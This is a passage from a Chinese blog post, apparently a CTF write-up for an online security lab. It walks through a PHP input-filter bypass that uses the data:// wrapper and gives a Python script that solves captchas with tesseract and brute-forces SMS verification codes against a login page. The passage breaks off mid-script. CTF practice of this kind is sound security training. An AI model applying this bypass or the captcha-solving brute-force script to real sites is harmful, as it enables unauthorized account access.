网络安全实验室CTF练习部分题目（持续更新）

最新推荐文章于 2024-09-18 14:59:02 发布

gwenchill

最新推荐文章于 2024-09-18 14:59:02 发布

阅读量8.4w

点赞数 15

分类专栏： CTF学习文章标签： CTF

本文链接：https://blog.csdn.net/gwenchill/article/details/46679621

版权

本文介绍了多个网络安全实验室CTF挑战的解题思路，涉及脚本关、解密关、综合关等，涵盖了PHP漏洞利用、验证码破解、MD5长度扩展攻击、XSS攻击等技术，通过实例解析了如何利用平行权限漏洞、Base64解码、MD5漏洞、XSS注入等手段完成挑战。

摘要由CSDN通过智能技术生成

1、脚本关：微笑一下，过关地址：http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php
查看源代码：

    include('flag.php'); 

    $smile = 1;  

   if (!isset ($_GET['^_^'])) $smile = 0;  
    if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/%/', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/[0-9]/', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/http/', $_GET['^_^']) ) $smile = 0;  
    if (preg_match ('/https/', $_GET['^_^']) ) $smile = 0;  
    if (preg_match ('/ftp/', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/telnet/', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0; 
    if ($smile) { 
        if (@file_exists ($_GET['^_^'])) $smile = 0;  
    }  
    if ($smile) { 
        $smile = @file_get_contents ($_GET['^_^']);  
        if ($smile === "(●'◡'●)") die($flag);  
    }

显然参数为^^=(●’◡’●)，但QUERY_STRING过滤了‘’，且文件不能存在，但可以读取文件内容，前面又过滤了一堆http、ftp等。因PHP自动回替换.为_，使用data协议，构造参数为：？^.^=data://text/plain;charset=unicode,(●’◡’●)

2、脚本关：验证码识别并进行手机验证码爆破 http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php#

提交之前需先点一下获取验证码，查看提交后的header，取得cookie，提交的参数。
识别验证码可用tesseract，代码如下：

#!/usr/bin/python
# -*- coding: utf-8 -*-

import requests  #调用url、cookie操作 文件操作的库
import sys
import time
from pytesseract import *
from PIL import Image

def vcode(pic_url,cookies):
    "python验证码识别函数"
    r = requests.get(pic_url, cookies=cookies, timeout=10)
    with open('vcode.png', 'wb') as pic:
        pic.write(r.content)
    image=Image.open('vcode.png')
    im = image_to_string(image)
    #print im
    im = im.replace(' ', '')
    if im.isdigit() and len(im)==4:
        return im
    else:
        return vcode(pic_url,cookies)

cookies = {
  'saeut': '14.19.157.117.1435504248010840','PHPSESSID':'2cec394dbfba709823daea4ba71eb04a'} 
payload = {
  'username': '13388886666', 'mobi_code': '100','user_code':'5053','Login':'submit'}
#headers = {'user-agent': 'my-app/0.0.1'}

picurl='http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'

url="http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php"
#filename = u"D:/User